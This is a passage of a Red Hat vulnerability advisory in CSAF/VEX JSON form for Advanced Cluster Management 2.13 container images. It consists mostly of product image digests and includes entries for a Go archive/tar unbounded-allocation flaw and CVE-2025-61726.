"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:736631a4d89bf44078b7f180ddcd474655d66ed43b85a4a79258eab9348656ff_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:ca58b27ea6673f0c506ed1ffad51918608a813dabf58f4845ab97d6e9f2c11d3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:21f6d86d21be3a9541fc577a647d8f38b81bca975dc82d9506056f44e6a35443_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:60a3e7e83d189003d185e2415f96b4f3be0912e4cbaa96ea4ed8ebcdce5cc1d0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:796abebd9573cacba87eb0c6497ed9617047eddba90f1c4b8237964ed954328d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:d130f2bb5b047483504d5c8113e0449983e79c49e8bda97b5752862930a91947_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:0a98f4d3e54b7410bfc1601f2ee2ba1308f30e40314bfc5169c3d99c3b8dfaa1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:3148a9662d732bbad15d6bd89cce43a886cba68ba1cefcef55f7bb65d3159432_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33c37b7bd401cfcf46d5cb42173fe3697a0649dc1080255dbd6243d4bfe8d08f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:cf1c1c1c778cafe6067df490969aab89a6b3e43487d954bb24b1409bc22f1091_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:118fe4fc31cb7818cda240c48628e5a3d43002c271fa7ba45d9631b7a6ddb8e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a2e5353298e0b0e46516d5127d0da65fcb5ac4498651693f347de1eb18e12095_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b10f9f52f0665ae2a8bb4bf2649aa6e3d1185a0dffb9ebeb11a8900174df5ef2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:c2bfb459d7442878d591cc31436830b983fe30dcfa6f7d383cc91cb32e42fa7c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:55320965b17fef48e776d39c548f0bf81a1e9239ee4b90a032f4b111e8748d2f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:a36bcef862d0e3cc972c9eb2c0d80311030659c13de6acab7e353905ff5eccff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:c7bfe530a7efe66f5c3e2e08b114b3b9e44072e3609725663d6a5f3945bda512_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:e73d91e157c13ea96615fc060f5312997203f6b6350d335917b2feacb96c9ca5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2003587575e18b2e6b9bf3617c65e0f83ebc8cf30daf6dd241500cd1555820e0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:6098254a7e2fdd67ef1773abda74d3dde3d31e59254f4a1cd5e77dc34d224602_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:7fa35da009ab6e41177f0589f6d3fbf1bbe3fff4b52add3bfbc516a046e35640_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:9418993b725bf813959ed5adbd21690ee2cbeeac3d56c7ab6805c3eb29b5d46f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:14fb16412dea57a775e95954c3a07a77de846f851935629bf9bfdbcc46a70f4f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:40f8ad6430cc767b56992722d5890f98882c7372950320d28e808c18714b7179_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:c227f25ae401af3eba9352765f906c8b873370485a7c748b1602e53c0776f90f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:ffb3e3cd6764e802b5e9f87034548f96dcacfeedd8fe2b3b21b06c41734e8320_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:24df1e0d7850220df3aa658c6056f81a68fe451ffd99e4d0dfee07cebe9c3782_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:25fb42a78847235c61e35f66a6e02dfee5fc0b6832aa4ce06c3c6f395b95b36d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9e19fc6fd3285c1833cd97eeef10cb179fe9705dea9b3f912052207b3a2daea7_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:edc8b960038279c012c5aa99917361ad0888b0195c3ee9adb368b798a5bea2fb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:231caddbaa1b499fae4efbf34c839941e595f242d12e22378e210b47de6262a8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:450199903a5d88d10b107768839780fbd0ee15535c6a998a0cac5bec942dd414_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:7fe0726987e478ed3da6d9b1eb4b611461e285ada827de6a186b95bc75a36c73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:8d8eb1e5a21a37f041f60fbd624c7861f2e726997c6ad1d5279f59a7c849f2af_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1628ce0aab57c09dad7f5b2a24bf664de71b76a38cd05ccf281bb8cc8fc5859e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e3f01077df87eb91ece7c2bd6cfa2c15a0044c2f9c40efee9ce1bf14a6807b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9bc74577f0edc3045a1a027c0f8652cc904fc3b9397dc9af10576f9dfcab2080_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:e9cab985b52c8f23b62cad3ea9c692e321a5347bd06fc56b19dfdb1801030567_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:01778cb2a2b9771a03ed8c7feb5b94a23225f60f4e49263e71dccd017cfd1164_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:0e4525617200428a5510108b0a0845fde43fd4e64804186af045df9680ca05b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:903c920eb068fcabdd16fb95f78902107892efa8e8a1ddda124d7f6bc1afdcd8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:ac486bf6a84c573a9774aadd4ea995a551c0abcbfb42dbbb71dc03e6c900a211_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:61b112b8ebb2ca4e41f5ee4b0c09ad0b53c3a6b60297fb8c1f158c28a8f10b3d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:6bd79f2c4c516adc626c73dec28892cbeab65e349dff8f1fcb11d7242b614805_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:c920a77dcf02347d116035d5cfef1a365e02022713788a14045a9be2a1bd1c5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:eb7788d29142ad36cba099b1dcebe3eb1c28366f87f611ca4d0b375bc7f4b19d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5b7668d6f3b7fb994c4bbbb86bdb92d4258b88ab92337394b66058255c048ad8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:64930ec82f003294eaf26f6ac59c493e1bfc8c3d7addeb4c5b8f0cfcf458c406_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:753415fcdcc9f6b8685a54d83f4d35d1104d690215125a36d6df2b9873ac6cd3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:c58049e17034c0df635df55fce49cab392af3194f57c03bbb842d7c2acb247e5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0907a51a72f39393da4bdee241333b08b5b5591f1e9a5de7d67ad586d11da59b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:498cdf1888c2ef9f031baafc288323ebd0fe5d9b009cedb1443605cf4153c0c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5ac47e52a78f31b8982de5b9144ec96baab80c78ba8d06d3efabda329e017d36_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:9819517abcb75b516ea0e158ad9cbb0a4ef847f7858531b751c04de5a53527be_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:2ae0730de393d5aeff08a9317fc70459421dd8d6fc7a65f2a9e4a28ae5b64d9d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:62c7b78b2726fd940db4bd435b13f6d07097395b069130b32ea0912c95333555_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8c986374ff8afd980f450877facc2927fdd6f655f3d6b7def6771485d00afeb1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8eeb6a344b773bdc4f50da36c956dbaa50d6474f5c045e92250274d0ed723b39_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:1d7f37fa0146f48291fd1dd12752d0a19c8e87c30e1698492b36274c79051a9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:5c3cc196a8638f6fae7c246ff6746f2f453bbfab8e018683ee297609713664ac_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:e539ec4ab10e81c08d68991e3c77efd43497f4a5561ee1315ff8d467736d245a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:fbc20e8545d4562d05df98d5cfbc91a7a2d802a9d4ff8c0ea733126687c42c26_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:111bbc8fda153d16c384a622dd659c53b8cdc47e495a9fada411a5042954ab6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:433f0b3d09889613d5214ba1c084bdc99bdcbce227fefd10b0d8491442698ea9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:51096baed7d6ed403d88ac2dd935a30313f618b7552fee2b07367db5069601d1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:b3eefeffd90660b8e463f2b06dc5ee2b46e235efae7c13ed893828a6c9598459_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:58a8acff99aaaacdb7c292b615c2ed9a0418d82f75273c1809a6db05811713fa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:661a4a1fb71f36ac1663232ca6e098d1c101dc16168eec7eee471ae11f98f66c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bc06192ce81eac533cb7c080e8aef6587991534cb9b1787537c49753c0985e3d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:e8207895ec9e7006746043cf04fbf1e2897aa30e74b9184665be2ac50f9fe650_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:3074a430dd8bbb0399ce649186cb6140d8525e5b7c1e05b79a4ab74a32d989b8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:34de933b36ee01444cdf4d4a45e47466ef8dad6ab6345134524595c191928ffe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:8a65d646180c7889d0ba1e3a11fd6796d0020301e4e721575f87585afd8f9dfe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:cf1b6cae5a10aec88554e71be094737b0a17efb07cd1175ca55f1799626f58f2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:036ee3882d4d6536c309d9aacea3dc611785deba3bd998092adcb1ba21664897_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:82914e82513e2f8522589886a5df6681d12c6442ff1b8ef05a21d31c09fa0f0d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:893831b7270214137b2fdf1e55f0175b4ef6de9b8763eaaf0e0a935c8ab1744d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d6e329af2d9c1648006e3fa0b0232562a2bed6e7a33c56e025517f7d9068b5cc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:131918c9878d040c3ec190a9c724a65dbf3bb27f55a0fcac250d92067dc69288_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:327af8db145b9bd6ada1c9f27faa493ce090af412c51dedd7b247e65dcad51fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:721ebc57b91b4f9bcfb25d7b29ee8a2ca60fcb231096af2812f9201778e3ca51_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:ebff3dd368f33d1aec215b947b88f4aa7e821db1577d448b8c6eb4e6ead7fe07_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:6a88ce891e0fc9619e983a5b63fef86f735b8df5eb56909075bd3bbb098dddf8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:7485348cced991c7a4399e21e077ed62b3a118b7093bd4f42f9863d9e0da5c26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:b8d70910405eec4d886b27fc348a982c0b6f906f7f0e65aceecffd9f09fd6602_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:e63891386bfb191cd0e74884cad1f86c462d57e51b9aeec7d9c5073ba4d723f9_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: archive/tar: Unbounded allocation when parsing GNU sparse map"
},
{
"cve": "CVE-2025-61726",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-28T20:01:42.791305+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:428a52072881ee7714539f7721313ca78e06fd0e39ceb8de12f8a0d33fb4cd55_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:5145c15e9fa57bdd1d072e7c88f27d5f8f51caf395e542ad8fb54a098f8c24fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:cb76c81b895dfb5bc384407baf76c5c74d9b509342e665f3d5ff234a40f16236_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:d7dae765d402cd9522c23689fc0e72f47659fc2f1184b8b16c51b6c5c6a2b890_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5af546f1d36b01b320fd950d227cdd8f62a765facc8614ba277fe218c5649e61_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:921a7995304e4648ac2fd0c08bec7d95adc09caca4d6d124cbba4ff8043edf19_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:a0928fa238b82f2c00778064d0f1e52ff507ffef7a0a3756b1f2f2022d375e4b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:fdc436ea03cb2d06976da109061aa0793672c306deef23708ee9e0b39395b6f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:2adb87f4433d9516e2111150bccafbbb8dec179bdf3fe3acd38d7b27411cb666_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:4afad9568dc7dd2d90c396d08d596258e813bb67e2901135b539f279af382e09_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:508d4d8ee312e8d720eeca38f3823438548c5ab1260d8fa822ca49765f7aeef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:a31ab1ae8b4c3ead24f9ce3c913a4754972bd548d6e5b10ca22e61a6d9d3539a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:35ba01a14b8f7a0ed0e79fd9efe48280d26afa10a316daaec512f39cc6839adb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:384d23bb3f4e6fd2425e1b60ded99f027dcbaad14e631ffbe84845821a1c3215_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:a8ca367caa43ec006811fe370fdf440328dd22fc39be11e48f36396b781f36bb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:db8b5776a9dcb4b87a4de948c4c11d0164e66df188f97be6a6fd7e9953f5501e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:1e0a1eadbb77f4f14d48357af6a5b12406ae912210b53c14018b642e4f62d1fe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:4816e73043b8f73143cff29cff41292e62bb36467ba28a260ee46fd43ece915c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71d6b8f5471d7a23918763eeea53d991d98adf170e228348b77d2412ce752751_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:87f2e1ee942b226835c97b7abe43a62802146755141a850137b9ab03dd6fccf6_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:2b6a43ae23126321b9c94b37da646db4943331200434edc6a54be156150065f2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:d24283b13f739561fae6bdfb730922a1d3804422dc41249e33e6084158afcec4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:e9df0b0323447cacad8942ecce2e690a9f498d5cb41b54e3bb55be6614ddaece_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:ed46808dba295cf093aa5caabc9782ee9f044c7e770adaf3657f57f0f6e1aaf9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:5a98450b5f85a75172ca51e2dcf096465635dc2e4c5fedfd74e1fdd665f3fa65_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:7388c812f31ff8f2b1c2653adf07906e2f50c356a1ad9130d3923d835e79e0e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:bd521270153c8b5b8193e08fe4a7c959e5b9d22ed7e74a87827580974b3836f1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fc3b40899a332c041667de0965d58f50325eaddc8547145a2dff9aede38d69bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0668bbb16723e23ae64e4337a1347a6e0d2854d1c173cbc59c17a829e430bc00_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:177c2cb59b6b43f4ea650bbb603b144ca37aece398635a458d518dd55cae7fb6_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:78b0d35ce4fce4d279ad089ccf284f5e1425f947d95c3c72c5755bb00464305c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:f3b200f2a00217299f66cab9f89de8673003d194292b41157f663799b5c61c3e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:02486920d371f14bcbafc720545c4a6f24523a46483e60c00c7f25f52b3ea476_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1cb3639dfe65b6568b53de130e7b36b8f5ebceedd76c110ddb64fbe860bfde14_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:4124ae57ffa1b26bfc0e68b62c8325c5e17d332dca85b618a4ccba60cf52d1b5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:8243cc9646e4ae89aabf299e476a94124c8244dd54e0fb1c848a6bbbd0c94f62_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:1ef6867542269af4ce8cee7225dfb4e64680715a1bb34ed510b9fbf84d88fb2d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:58a418395bf71e339145d259b6906172fbc066e17e05071ce983c5615e703075_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:81f72d7522fcc4a0e948e52987671328dcbfd726b54125a23d893cd45e6cbdd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:f4ad6f2ed37be694b95b1c00b32f797cc29a0dab790207a254b4d4f4f2aa7158_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:0bd1b50f01e6228c56cf07c005ac8ead15d814b09813157b79fcea9292e42551_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:82107bc3ac83308ba96111cc5690a23d116bcd71c7a65face89e4d530b2e8382_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a673e83cb652160fc3db1b69505d21a634a15fcc68f3940bda25f64dc0ae7bb6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a765f440d03be4c90a764f6ec1a2bf2d4c4acb0f8af630aff9811aaa631327ca_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:e8b775e29dbba36821b79231e35017cefd5bb6d245dd1c2d8004150c4998a89c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eaa602fc272af9fce6ea4b2b2e700e24fc29b7fcaad3437abc73f247a5f994aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:ef6cd34e8f03c566dea492474495c0142a506b973b1a1ae00667de2993c88209_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:fbf35da688ccf2c7049320cee23dcbc518d2787d52c78574ff44e481a38ec20f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:83bc597e83bd0756afa67adcbd50858b0d1c23f87b572706e9059dd26055b4a0_ppc64le",
